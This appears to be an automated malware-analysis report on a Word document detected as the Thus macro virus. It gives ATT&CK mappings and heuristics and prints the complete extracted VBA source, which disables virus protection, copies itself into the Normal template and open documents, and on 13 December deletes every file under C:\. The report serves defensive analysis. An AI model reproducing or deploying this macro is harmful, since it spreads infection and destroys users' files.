MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1053.005 Scheduled Task/Job
The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The macro attempts to disable virus protection and ensure its own persistence by copying itself to the Normal template and other open documents. The presence of the 'Doc.Trojan.Thus-8' ClamAV detection strongly suggests this is a known malware family.
Heuristics 3
-
ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then NormalTemplate.VBProject.VBComponents.Item(1).C …
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2383 bytes |
SHA-256: 6ab2261a029f9d9ab697f4c911d4e2e374176c8c995f3ac03e77ca0914d56344 |
|||
|
Detection
ClamAV:
Doc.Trojan.Thus-8
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _ .CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _ .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _ .Item(1).CodeModule.CountOfLines) End If If NormalTemplate.Saved = False Then NormalTemplate.Save For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.DeleteLines 1, Application.Documents.Item(k) _ .VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _ .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _ .VBComponents.Item(1).CodeModule.CountOfLines) End If Next k If (Day(Now()) = 13) And (Month(Now()) = 12) Then With Application.FileSearch .NewSearch .LookIn = "C:\" .SearchSubFolders = True .FileName = "*.*" .MatchTextExactly = False .FileType = msoFileTypeAllFiles If .Execute > 0 Then For i = 1 To .FoundFiles.Count Kill .FoundFiles(i) Next i End If End With End If End Sub Private Sub Document_Close() Document_Open End Sub Private Sub Document_New() Document_Open End Sub |
|||
icc_00_off000001e0.icc |
pdf-icc-profile | PDF ICC profile at offset 0x1E0 | 1320 bytes |
SHA-256: eb03db58ff1f226c83103a11f30b5520f9b68a7ced67daa78992723e3ea0411d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.